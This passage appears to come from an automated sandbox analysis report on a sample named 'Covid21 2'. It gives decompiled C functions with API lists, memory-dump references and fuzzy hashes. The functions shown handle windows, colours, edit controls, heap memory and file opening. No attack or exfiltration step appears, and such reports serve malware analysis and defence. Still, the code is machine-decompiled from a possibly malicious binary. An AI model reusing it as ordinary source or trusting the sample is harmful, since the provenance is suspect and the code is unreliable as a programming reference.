                                  								if(_t99 == 0x138) {
                                  									goto L98;
                                  								}
                                  								__eflags = _t99 - 0x30d5;
                                  								if(_t99 == 0x30d5) {
                                  									PostMessageA(_a4, 0x30d6, _a12, _t156);
                                  									L63:
                                  									_a16 = _a16 & 0x00000000;
                                  									goto L104;
                                  								}
                                  								__eflags = _t99 - 0x30d6;
                                  								if(_t99 != 0x30d6) {
                                  									goto L104;
                                  								}
                                  								__eflags = _t156 - 0x203;
                                  								_t157[3] = 0x332e;
                                  								 *_t157 = _a12;
                                  								if(_t156 != 0x203) {
                                  									__eflags = _t156 - 0x206;
                                  									if(_t156 != 0x206) {
                                  										__eflags = _t156 - 0x201;
                                  										if(_t156 != 0x201) {
                                  											__eflags = _t156 - 0x204;
                                  											if(_t156 != 0x204) {
                                  												_t157[3] = _t155;
                                  											} else {
                                  												_t157[2] = 1;
                                  											}
                                  										} else {
                                  											_t157[2] = _t155;
                                  										}
                                  									} else {
                                  										_t157[2] = 3;
                                  									}
                                  								} else {
                                  									_t157[2] = 2;
                                  								}
                                  								goto L103;
                                  							}
                                  							if(_t99 >= 0x114) {
                                  								goto L98;
                                  							}
                                  							_t172 = _t99 - 0x14;
                                  							if(_t172 > 0) {
                                  								__eflags = _t99 - 0x15;
                                  								if(_t99 == 0x15) {
                                  									__eflags = _t148 - _t155;
                                  									if(_t148 != _t155) {
                                  										__eflags =  *((intOrPtr*)(_t148 + 0x1c)) - _t155;
                                  										if( *((intOrPtr*)(_t148 + 0x1c)) == _t155) {
                                  											 *0x40a85c(_a4, E004056D9, 0);
                                  										}
                                  									}
                                  									goto L104;
                                  								}
                                  								__eflags = _t99 - 0x24;
                                  								if(_t99 == 0x24) {
                                  									__eflags = _t148 - _t155;
                                  									if(_t148 == _t155) {
                                  										goto L104;
                                  									}
                                  									_t110 =  *(_t148 + 0x24) & 0x0000ffff;
                                  									__eflags = _t110 - _t155;
                                  									if(_t110 != _t155) {
                                  										 *(_t156 + 0x18) = _t110 & 0x0000ffff;
                                  									}
                                  									_t111 =  *(_t148 + 0x26) & 0x0000ffff;
                                  									__eflags = _t111 - _t155;
                                  									if(_t111 != _t155) {
                                  										 *(_t156 + 0x1c) = _t111 & 0x0000ffff;
                                  									}
                                  									_t112 =  *(_t148 + 0x28) & 0x0000ffff;
                                  									__eflags = _t112 - _t155;
                                  									if(_t112 != _t155) {
                                  										 *(_t156 + 0x20) = _t112 & 0x0000ffff;
                                  									}
                                  									_t113 =  *(_t148 + 0x2a) & 0x0000ffff;
                                  									__eflags = _t113 - _t155;
                                  									if(_t113 != _t155) {
                                  										 *(_t156 + 0x24) = _t113 & 0x0000ffff;
                                  									}
                                  									goto L103;
                                  								}
                                  								__eflags = _t99 - 0x4e;
                                  								if(_t99 == 0x4e) {
                                  									_push(_t156);
                                  									_push(_a12);
                                  									_push(0x4e);
                                  									_push(_a4);
                                  									_push(_t156->i);
                                  									goto L99;
                                  								}
                                  								__eflags = _t99 - 0x111;
                                  								if(_t99 != 0x111) {
                                  									goto L104;
                                  								}
                                  								_t149 = _a12;
                                  								_t118 = L00405625(_t156, _a4, 0x111, _t149, _t156);
                                  								__eflags = _t118 - 0xd0d0d0d1;
                                  								if(_t118 != 0xd0d0d0d1) {
                                  									goto L63;
                                  								}
                                  								_t120 = _t149 >> 0x10;
                                  								__eflags = _t156;
                                  								if(_t156 == 0) {
                                  									__eflags = _t120;
                                  									if(_t120 == 0) {
                                  										L54:
                                  										 *_t157 = _t149;
                                  										L62:
                                  										_t157[3] = 0x332d;
                                  										goto L63;
                                  									}
                                  									__eflags = _t149 - 0xfa01;
                                  									if(_t149 != 0xfa01) {
                                  										__eflags = _t149 - 0xfa02;
                                  										if(_t149 != 0xfa02) {
                                  											 *_t157 = _t149 & 0x0000ffff;
                                  											goto L62;
                                  										}
                                  										_push(1);
                                  										L58:
                                  										E00405C70();
                                  										goto L63;
                                  									}
                                  									_push(0);
                                  									goto L58;
                                  								}
                                  								_t157[3] = 0x332c;
                                  								_t157[2] = _t120;
                                  								_t123 = GetWindowLongA(_t156, 0xfffffff4);
                                  								__eflags = _t123 - 0xffffd8f0;
                                  								 *_t157 = _t123;
                                  								if(_t123 != 0xffffd8f0) {
                                  									goto L63;
                                  								}
                                  								_t149 = _t149 & 0x0000ffff;
                                  								__eflags = _t149;
                                  								goto L54;
                                  							}
                                  							if(_t172 == 0) {
                                  								__eflags = _t148 - _t155;
                                  								if(_t148 != _t155) {
                                  									__eflags =  *(_t148 + 0x18);
                                  									if( *(_t148 + 0x18) == 0) {
                                  										_t125 = _a4;
                                  										__eflags =  *_t148 - _t125;
                                  										if( *_t148 == _t125) {
                                  											_t150 =  *(_t148 + 0x20);
                                  											__eflags = _t150;
                                  											if(_t150 != 0) {
                                  												_a16 = _t150->i(_a12, _t125);
                                  											}
                                  										}
                                  									} else {
                                  										GetClientRect(_a4,  &_v28);
                                  										FillRect(_a12,  &_v28,  *(_t148 + 0x18));
                                  										_a16 = 1;
                                  									}
                                  								}
                                  								E00405685(_t157, 0xf, _v8);
                                  								goto L104;
                                  							}
                                  							_t131 = _t99 - 3;
                                  							if(_t131 == 0) {
                                  								L19:
                                  								if(_t151 != 0xffffffff) {
                                  									E00405685(_t157, _a8, _v8);
                                  									_t155 = 0;
                                  								}
                                  								goto L103;
                                  							}
                                  							_t134 = _t131;
                                  							if(_t134 == 0) {
                                  								__eflags = _v12 - _a4;
                                  								if(_v12 != _a4) {
                                  									L25:
                                  									_a16 = 1;
                                  									goto L104;
                                  								}
                                  								__eflags = _t151 - 0xffffffff;
                                  								if(_t151 == 0xffffffff) {
                                  									goto L104;
                                  								}
                                  								_t137 = _a12 - _t155;
                                  								__eflags = _t137;
                                  								if(_t137 == 0) {
                                  									__eflags =  *(_t148 + 0x2c) - _t155;
                                  									if( *(_t148 + 0x2c) == _t155) {
                                  										L36:
                                  										_push(_v8);
                                  										L37:
                                  										_push(5);
                                  										L38:
                                  										_push(_t157);
                                  										E00405685();
                                  										goto L63;
                                  									} else {
                                  										_push(_v8);
                                  										_t39 = _t148 + 0x2c;
                                  										 *_t39 =  *(_t148 + 0x2c) & 0x00000000;
                                  										__eflags =  *_t39;
                                  										_push(0x3335);
                                  										L35:
                                  										_push(_t157);
                                  										E00405685();
                                  										goto L36;
                                  									}
                                  								}
                                  								_t140 = _t137 - 1;
                                  								__eflags = _t140;
                                  								_push(_v8);
                                  								if(_t140 == 0) {
                                  									 *(_t148 + 0x2c) = 1;
                                  									_push(0x3333);
                                  									goto L38;
                                  								}
                                  								__eflags = _t140 != 1;
                                  								if(_t140 != 1) {
                                  									goto L37;
                                  								} else {
                                  									 *(_t148 + 0x2c) = 1;
                                  									_push(0x3334);
                                  									goto L35;
                                  								}
                                  							}
                                  							_t142 = _t134 - 1;
                                  							if(_t142 == 0) {
                                  								__eflags = _a12 - _t155;
                                  								if(_a12 != _t155) {
                                  									E00405685(_t157, 0x3330, _v8);
                                  								}
                                  								goto L25;
                                  							}
                                  							if(_t142 != 0xa) {
                                  								goto L104;
                                  							}
                                  							goto L19;
                                  						} else {
                                  							L9:
                                  							_t96 =  *_t98(_a4, _a8, _a12, _t156);
                                  							if(_t96 != 0xe0e0e0e1) {
                                  								goto L105;
                                  							} else {
                                  								_t155 = 0;
                                  								goto L11;
                                  							}
                                  						}
                                  					}
                                  					_t98 =  *(_t148 + 0xc);
                                  					if(_t98 == 0) {
                                  						goto L21;
                                  					}
                                  					goto L9;
                                  				} else {
                                  					goto L2;
                                  				}
                                  				while(1) {
                                  					L2:
                                  					_t145 = GetPropA(_v12, "PB_WindowID");
                                  					_v8 = _t145;
                                  					if(_t145 != 0) {
                                  						break;
                                  					}
                                  					_t147 = GetParent(_v12);
                                  					_v12 = _t147;
                                  					if(_t147 != 0) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				if(_v12 == _t148) {
                                  					goto L6;
                                  				} else {
                                  					_v8 = _v8 - 1;
                                  					_t148 = E00406690( *0x40b474, _v8);
                                  					goto L7;
                                  				}
                                  			}





































                                  APIs
                                    • Part of subcall function 0040523F: SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                    • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000010), ref: 004052B8
                                    • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000020), ref: 004052C1
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                    • Part of subcall function 0040523F: GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000005), ref: 004052F1
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000002E), ref: 00405311
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000022), ref: 00405320
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000023), ref: 00405327
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                    • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003C), ref: 00405335
                                    • Part of subcall function 0040523F: SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                    • Part of subcall function 0040523F: GetKeyState.USER32(00000001), ref: 0040534E
                                    • Part of subcall function 0040523F: SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                    • Part of subcall function 0040523F: SetCapture.USER32(?), ref: 00405369
                                    • Part of subcall function 0040523F: PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                  • GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                  • GetParent.USER32(?), ref: 00405746
                                  • GetClientRect.USER32(?,00000000), ref: 004058A2
                                  • FillRect.USER32(?,00000000,?), ref: 004058B2
                                  • GetWindowLongA.USER32(?,000000F4), ref: 0040593F
                                  • PostMessageA.USER32(?,000030D6,?,?), ref: 00405AB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: System$Metrics$MessageRectWindow$LongPostSend$CaptureClientFillInfoParametersParentPropState
                                  • String ID: PB_WindowID
                                  • API String ID: 2736716905-1508741625
                                  • Opcode ID: 93faa1de843ff13983a97f0fb80ea3da8452202db0794824d6d1b7a3769e1e84
                                  • Instruction ID: 1772321966a510f6b624cdf624929c11ab729ec9b834574b68c11bb728a73535
                                  • Opcode Fuzzy Hash: 93faa1de843ff13983a97f0fb80ea3da8452202db0794824d6d1b7a3769e1e84
                                  • Instruction Fuzzy Hash: 26B1AE71600A06EBDF20AF55C884ABB7BB1EB54314F60843BE845B62D0D33D9A91EF1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0040384E(struct HWND__* _a4) {
                                  				long _t3;
                                  				struct HWND__* _t16;
                                  				intOrPtr* _t18;
                                  
                                  				_t16 = _a4;
                                  				_t3 = GetWindowThreadProcessId(_t16, 0);
                                  				if(_t3 == GetCurrentThreadId() && IsWindowVisible(_t16) != 0 && IsWindowEnabled(_t16) != 0 && _t16 != GetForegroundWindow()) {
                                  					EnableWindow(_t16, 0);
                                  					_push(0x10);
                                  					_t18 = E004067DA(0x40b208);
                                  					 *(_t18 + 4) = _t16;
                                  					 *_t18 = GetCurrentThreadId();
                                  				}
                                  				return 1;
                                  			}







                                  APIs
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00403858
                                  • GetCurrentThreadId.KERNEL32 ref: 00403866
                                  • IsWindowVisible.USER32(?), ref: 0040386D
                                  • IsWindowEnabled.USER32(?), ref: 00403878
                                  • GetForegroundWindow.USER32 ref: 00403882
                                  • EnableWindow.USER32(?,00000000), ref: 0040388F
                                    • Part of subcall function 004067DA: RtlAllocateHeap.NTDLL(00000008,00000000,00406649), ref: 004067E6
                                  • GetCurrentThreadId.KERNEL32 ref: 004038A8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
                                  • String ID:
                                  • API String ID: 2983394722-0
                                  • Opcode ID: 1d3563f3127e023f913d1c48bb15226510de4f21d660f64e0808139afde0f23e
                                  • Instruction ID: 3bd772517b7cdc64e9e8b09daf0a4afa7eecbfefda2ab3240d0ef6d89adb4e94
                                  • Opcode Fuzzy Hash: 1d3563f3127e023f913d1c48bb15226510de4f21d660f64e0808139afde0f23e
                                  • Instruction Fuzzy Hash: D9F04F321043005BE321AF75AD88B2B7BF8EB45751B14843AF545F3291DB38D811962E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E004042F1(struct HWND__** __esi, intOrPtr _a16, struct HDC__* _a20) {
                                  				long _t9;
                                  				long _t10;
                                  				struct HDC__* _t17;
                                  				struct HWND__** _t22;
                                  				struct HWND__* _t24;
                                  
                                  				_t22 = __esi;
                                  				_push(ss);
                                  				if(_a16 == 0x138 && IsWindowEnabled( *__esi) != 0) {
                                  					_t9 = __esi[5];
                                  					_t17 = _a20;
                                  					if(_t9 != 0xffffffff) {
                                  						SetTextColor(_t17, _t9);
                                  						if(__esi[4] == 0xffffffff) {
                                  							SetBkColor(_t17, GetSysColor(0x14));
                                  							_t24 = GetSysColorBrush(0x14);
                                  						}
                                  					}
                                  					_t10 = _t22[4];
                                  					if(_t10 != 0xffffffff) {
                                  						SetBkColor(_t17, _t10);
                                  						_t24 = _t22[6];
                                  					}
                                  				}
                                  				return _t24;
                                  			}









                                  APIs
                                  • IsWindowEnabled.USER32 ref: 004042FE
                                  • SetTextColor.GDI32(?,00000138), ref: 0040431E
                                  • GetSysColor.USER32(00000014), ref: 0040432C
                                  • SetBkColor.GDI32(?,00000000), ref: 00404334
                                  • GetSysColorBrush.USER32(00000014), ref: 00404338
                                  • SetBkColor.GDI32(?,?), ref: 0040434A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Color$BrushEnabledTextWindow
                                  • String ID:
                                  • API String ID: 3110319690-0
                                  • Opcode ID: f694d0c257acf5403a6b010375976c4580f9c7e074fbf9002324fa678aa0eddd
                                  • Instruction ID: c830c63a156bfd98ae0213a8c6392a2a45bc1c2ca30302da665ab6d8e089a352
                                  • Opcode Fuzzy Hash: f694d0c257acf5403a6b010375976c4580f9c7e074fbf9002324fa678aa0eddd
                                  • Instruction Fuzzy Hash: EDF036712003049FD6206F75AD44D6773F8EB94321B145B35F661E36E1C774EC158A35
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407650(void* __ecx, void** _a4, char* _a8) {
                                  				int _v8;
                                  				void* _t21;
                                  				void* _t29;
                                  				void* _t42;
                                  
                                  				_v8 = 0;
                                  				if(_a8 == 0) {
                                  					if( *_a4 != 0) {
                                  						_t21 =  *0x40b3fc; // 0x29a0000
                                  						HeapFree(_t21, 1,  *_a4);
                                  						 *_a4 = 0;
                                  					}
                                  				} else {
                                  					_v8 = strlen(_a8);
                                  					if( *_a4 != 0) {
                                  						_t42 =  *0x40b3fc; // 0x29a0000
                                  						 *_a4 = RtlReAllocateHeap(_t42, 1,  *_a4, _v8 + 5);
                                  					} else {
                                  						_t29 =  *0x40b3fc; // 0x29a0000
                                  						 *_a4 = RtlAllocateHeap(_t29, 1, _v8 + 5);
                                  					}
                                  					E00407810(_a4,  *_a4, _a8, _v8);
                                  				}
                                  				return _v8 + 1;
                                  			}








                                  APIs
                                  • strlen.MSVCRT ref: 00407665
                                  • RtlAllocateHeap.NTDLL(029A0000,00000001,-00000005), ref: 00407687
                                  • RtlReAllocateHeap.NTDLL(029A0000,00000001,?,-00000005), ref: 004076AA
                                  • HeapFree.KERNEL32(029A0000,00000001,Continue?,?,?,0040310F), ref: 004076E0
                                  Strings
                                  Similarity
                                  • API ID: Heap$Allocate$Freestrlen
                                  • String ID: Continue?
                                  • API String ID: 3543670626-4041895036
                                  • Opcode ID: e18bcd1afd36fd495d460676a976782b0225e8f390700b3e19994c5fad29eb23
                                  • Instruction ID: cae9a5905be6ddab59d871ac1b064cb42395ff2a8ffa857ff663baf975441a1f
                                  • Opcode Fuzzy Hash: e18bcd1afd36fd495d460676a976782b0225e8f390700b3e19994c5fad29eb23
                                  • Instruction Fuzzy Hash: 8D212E75A04208EFCB00DF58C984FAA37B5EF88314F20C469F8059B390D776AE51DB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004047BB(void* __ecx, void* _a4, struct HWND__* _a8, struct HWND__* _a12, intOrPtr _a16) {
                                  				intOrPtr _v8;
                                  				intOrPtr _t16;
                                  				struct HWND__* _t22;
                                  				struct HWND__* _t24;
                                  				intOrPtr _t29;
                                  				struct HWND__* _t32;
                                  
                                  				_t16 = E0040642D( *0x40b470);
                                  				_t32 = _a8;
                                  				_v8 = _t16;
                                  				if(_a4 == 0xffffffff) {
                                  					_a4 = _t32;
                                  				}
                                  				_t24 = _a12;
                                  				_t32->i = _t24;
                                  				 *((intOrPtr*)(_t32 + 4)) = _a16;
                                  				 *((intOrPtr*)(_t32 + 0xc)) = SetWindowLongA(_t24, 0xfffffffc, E00404714);
                                  				SetWindowLongA(_t24, 0xfffffff4, _a4);
                                  				SetPropA(_t24, "PB_ID", _a4);
                                  				_t29 = _v8;
                                  				SendMessageA(_t24, 0x30,  *(_t29 + 8), 1);
                                  				 *(_t29 + 4) =  *(_t29 + 4) & 0x00000000;
                                  				_t22 = _t32;
                                  				if(_a4 != _t32) {
                                  					_t22 = _t24;
                                  				}
                                  				return _t22;
                                  			}










                                  APIs
                                  • SetWindowLongA.USER32(?,000000FC,00404714), ref: 004047F5
                                  • SetWindowLongA.USER32(?,000000F4,000000FF), ref: 00404800
                                  • SetPropA.USER32(?,PB_ID,000000FF), ref: 0040480B
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040481C
                                  Strings
                                  Similarity
                                  • API ID: LongWindow$MessagePropSend
                                  • String ID: PB_ID
                                  • API String ID: 499798845-4173770792
                                  • Opcode ID: 40e9597ea4ba8294d3e4968612d768a12a22f2b24764c9d991eb6ad8814dbeb4
                                  • Instruction ID: d0f6b8676c2a3c83e12209fd00d02ec4e2cc3fdc8a34abd3e45ab61e197bb196
                                  • Opcode Fuzzy Hash: 40e9597ea4ba8294d3e4968612d768a12a22f2b24764c9d991eb6ad8814dbeb4
                                  • Instruction Fuzzy Hash: FF0180B5500308BFCB109F55DD84D8A7BB8FB44760F208626F925672D1C374D950CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406060(long __eax, CHAR* __ebx, void* __eflags, intOrPtr _a4) {
                                  				void* _v4;
                                  				intOrPtr _t13;
                                  				intOrPtr _t23;
                                  				void* _t24;
                                  				intOrPtr* _t25;
                                  				long _t26;
                                  				void* _t27;
                                  
                                  				_t23 =  *0x40b484; // 0x27d05a8
                                  				_t26 = __eax;
                                  				_t25 = E0040662C(_t23, _a4);
                                  				if(_t26 != 1) {
                                  					if(_t26 != 2) {
                                  						if(_t26 != 3) {
                                  							_t27 = _v4;
                                  							goto L8;
                                  						} else {
                                  							_t27 = CreateFileA(__ebx, 0xc0000000, 1, 0, 2, 0x80, 0);
                                  							if(_t27 != 0xffffffff) {
                                  								goto L9;
                                  							} else {
                                  								_t27 = CreateFileA(__ebx, 0x40000000, 1, 0, 5, 0, 0);
                                  								goto L8;
                                  							}
                                  						}
                                  					} else {
                                  						_t27 = CreateFileA(__ebx, 0xc0000000, 1, 0, 4, 0x80, 0);
                                  						goto L8;
                                  					}
                                  				} else {
                                  					_t27 = CreateFileA(__ebx, 0x80000000, _t26, 0, 3, 0x80, 0);
                                  					L8:
                                  					if(_t27 == 0xffffffff) {
                                  						L13:
                                  						if(_a4 == 0xffffffff) {
                                  							_t13 =  *0x40b484; // 0x27d05a8
                                  							E004066BB(_t13, _t25);
                                  						}
                                  						return 0;
                                  					} else {
                                  						L9:
                                  						if(_t27 == 0) {
                                  							goto L13;
                                  						} else {
                                  							 *_t25 = _t27;
                                  							_t24 =  *0x40b13c; // 0x27d0000
                                  							 *((intOrPtr*)(_t25 + 4)) = RtlAllocateHeap(_t24, 0, 0x1000);
                                  							 *(_t25 + 8) = 0x1000;
                                  							 *(_t25 + 0xc) = 0;
                                  							 *(_t25 + 0x14) = 1;
                                  							if(_v4 != 0xffffffff) {
                                  								return _t27;
                                  							} else {
                                  								return _t25;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}











                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,027D05A8,?,?,?,027D12D0,?,00406244,00000001,00000001), ref: 00406090
                                  • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,027D05A8,?,?,?,027D12D0,?,00406244,00000001,00000001), ref: 004060B2
                                  • RtlAllocateHeap.NTDLL(027D0000,00000000,00001000), ref: 00406116
                                  Similarity
                                  • API ID: CreateFile$AllocateHeap
                                  • String ID:
                                  • API String ID: 2813278966-0
                                  • Opcode ID: d5ac88bd3ffc28555abfcd2760e7205fba9400b2e16f2a0410e4f88c6c94f8a9
                                  • Instruction ID: 01b71ff79a8bf0c406e829018b558c6d2fff1d90de16ee11da95a5ed4ef269dc
                                  • Opcode Fuzzy Hash: d5ac88bd3ffc28555abfcd2760e7205fba9400b2e16f2a0410e4f88c6c94f8a9
                                  • Instruction Fuzzy Hash: 2521E77278031176E6309B28AD06F57B3589744B71F22873AFB62BB2C1C6B5AC60479D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040416A(intOrPtr _a4, intOrPtr _a12, struct HDC__* _a16) {
                                  				long _t9;
                                  				long _t10;
                                  				struct HDC__* _t17;
                                  				intOrPtr _t23;
                                  				struct HBRUSH__* _t25;
                                  
                                  				_t25 = 0xd0d0d0d1;
                                  				if(_a12 == 0x138) {
                                  					_t17 = _a16;
                                  					_t23 = _a4;
                                  					_t9 =  *(_t23 + 0x14);
                                  					if(_t9 != 0xffffffff) {
                                  						SetTextColor(_t17, _t9);
                                  						if( *(_t23 + 0x10) == 0xffffffff) {
                                  							SetBkColor(_t17, GetSysColor(0xf));
                                  							_t25 = GetSysColorBrush(0xf);
                                  						}
                                  					}
                                  					_t10 =  *(_t23 + 0x10);
                                  					if(_t10 != 0xffffffff) {
                                  						SetBkColor(_t17, _t10);
                                  						_t25 =  *((intOrPtr*)(_t23 + 0x18));
                                  					}
                                  				}
                                  				return _t25;
                                  			}









                                  APIs
                                  • SetTextColor.GDI32(?,?), ref: 00404195
                                  • GetSysColor.USER32(0000000F), ref: 004041A3
                                  • SetBkColor.GDI32(?,00000000), ref: 004041AB
                                  • GetSysColorBrush.USER32(0000000F), ref: 004041AF
                                  • SetBkColor.GDI32(?,?), ref: 004041C1
                                  Similarity
                                  • API ID: Color$BrushText
                                  • String ID:
                                  • API String ID: 3324192670-0
                                  • Opcode ID: 6172721f2218073eb60c4652dad57f6f5c5b2bdd0d3b9622d53c644380a3572e
                                  • Instruction ID: 457ded62e3f9d5314adae7d240338f31a7adc438ae7f8fffd0e9670b0be44b42
                                  • Opcode Fuzzy Hash: 6172721f2218073eb60c4652dad57f6f5c5b2bdd0d3b9622d53c644380a3572e
                                  • Instruction Fuzzy Hash: ACF044B5100304ABD220AB299C48D67B3ECEBA4331F104B36F675E32D1C774EC558A65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004043AE(intOrPtr _a4, int _a8, int _a12, int _a16, int _a20, CHAR* _a24, signed int _a28) {
                                  				long _t23;
                                  				signed int _t27;
                                  				struct HWND__* _t29;
                                  				struct HWND__** _t31;
                                  				void* _t32;
                                  
                                  				_t31 = E0040642D( *0x40b470);
                                  				if( *0x40b354 == 0) {
                                  					memset(0x40b2c0, 0, 0x94);
                                  					 *0x40b2c0 = 2;
                                  					 *0x40b2c4 = 0x94;
                                  					 *0x40b2c8 = 0x4042dd;
                                  					 *0x40b338 = E00404680;
                                  					 *0x40b33c = E004046DA;
                                  					 *0x40b2cc = E00404700;
                                  					 *0x40b354 = 1;
                                  				}
                                  				if(_a24 == 0) {
                                  					_a24 = 0x409000;
                                  				}
                                  				_t27 = _a28;
                                  				_t28 = _t27 | 0x50030080;
                                  				_t29 = CreateWindowExA( !(_t27 >> 8) & 0x00000200, "Edit", _a24, _t27 | 0x50030080, _a8, _a12, _a16, _a20,  *_t31, 0xffffffff,  *0x40b140, 0);
                                  				if(_t29 != 0) {
                                  					_t32 = E0040662C( *0x40b46c, _a4);
                                  					_t23 = SetWindowLongA(_t29, 0xfffffffc, E00404358);
                                  					 *(_t32 + 0x14) =  *(_t32 + 0x14) | 0xffffffff;
                                  					 *(_t32 + 0x10) =  *(_t32 + 0x10) | 0xffffffff;
                                  					 *0x40b2b8 = _t23;
                                  					_t29 = E004047BB(_t28, _a4, _t32, _t29, 0x40b2c0);
                                  				}
                                  				return _t29;
                                  			}









                                  APIs
                                  • memset.MSVCRT ref: 004043D8
                                  • CreateWindowExA.USER32(?,Edit,00000000,?,00000000,?,?,00000000,00000000,000000FF,00000000), ref: 00404466
                                  • SetWindowLongA.USER32(00000000,000000FC,00404358), ref: 0040448A
                                  Strings
                                  Similarity
                                  • API ID: Window$CreateLongmemset
                                  • String ID: Edit
                                  • API String ID: 2917088559-554135844
                                  • Opcode ID: bec187a942d1b656482ed2905f925c0f6a25d2fe3050e444c708e093468e8e0b
                                  • Instruction ID: e5c386e0b925eee2f29b2e51a672b597ac0c5d848ebaae7b82fd60e27dbe053f
                                  • Opcode Fuzzy Hash: bec187a942d1b656482ed2905f925c0f6a25d2fe3050e444c708e093468e8e0b
                                  • Instruction Fuzzy Hash: 3C217CB5500309AFDB115F11ED09B5B3EA5FB80325F20823EFA64B62E1C77988248B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403A79(void* __eflags, intOrPtr _a4) {
                                  				void* _t8;
                                  				long _t16;
                                  				void* _t17;
                                  
                                  				_t17 = E00407750(0x104, _a4);
                                  				_t16 = GetModuleFileNameA( *0x40b140, _t17, 0x104);
                                  				if(strcmp(_t17, "\\\\?\\") == 0) {
                                  					_t2 = _t16 - 4; // -4
                                  					_t3 = _t17 + 4; // 0x4
                                  					memmove(_t17, _t3, _t2);
                                  					_t16 = _t16 - 4;
                                  				}
                                  				_t8 = E004077F0(0x104 - _t16);
                                  				 *((char*)(_t16 + _t17)) = 0;
                                  				return _t8;
                                  			}







                                  APIs
                                    • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(029A0000,00000001,029A06F0,000040FF), ref: 00407797
                                  • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,?,?,?,00000000,00401B68,00000000,00000000,00000000,00000000,00000001,00000001,00000001,00000000), ref: 00403A95
                                  • strcmp.MSVCRT ref: 00403AA3
                                  • memmove.MSVCRT ref: 00403AB7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
